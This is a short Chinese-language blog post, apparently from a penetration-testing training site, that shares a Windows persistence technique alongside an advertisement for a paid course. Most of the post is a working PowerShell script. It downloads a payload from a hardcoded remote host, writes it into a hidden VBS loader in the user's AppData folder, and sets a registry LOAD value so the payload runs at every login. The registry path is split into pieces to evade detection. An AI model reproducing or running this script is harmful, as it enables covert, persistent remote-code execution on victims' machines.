分享一个维权手法
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

#>
#使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload
function Add-Persistence()
{
#payload的路径
$payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2"
#保存维权马的路径
$tmpdir = $env:APPDATA;
#vbs路径
$payloadvbsloaderpath = "$tmpdir\_log.vbs"
#下载payload
$payload = (New-Object Net.WebClient).DownloadString($payloadurl)
$vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
$vbs += "ps = ""$payload""`r`n"
$vbs += "oShell.run(ps),0,true"
$vbs | Out-File $payloadvbsloaderpath -Force
#隐藏文件
$fileObj = get-item $payloadvbsloaderpath -Force
$fileObj.Attributes = "Hidden"
#新建注册表
$HKCU1 = "HKCU:\"
$HKCU2 = "Software\Microsoft"
$HKCU3 = "\Windows NT\Current"
$HKCU4 = "Version\Windows"
$HKCU = $HKCU1 + $HKCU2 + $HKCU3 + $HKCU4
#操作注册表的值
Set-ItemProperty -Path $HKCU -Name LOAD -Value $payloadvbsloaderpath
}
Add-Persistence
来源 https://mp.weixin.qq.com/s/t98nGFycEqSytvqQTK2lNw
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/3382.html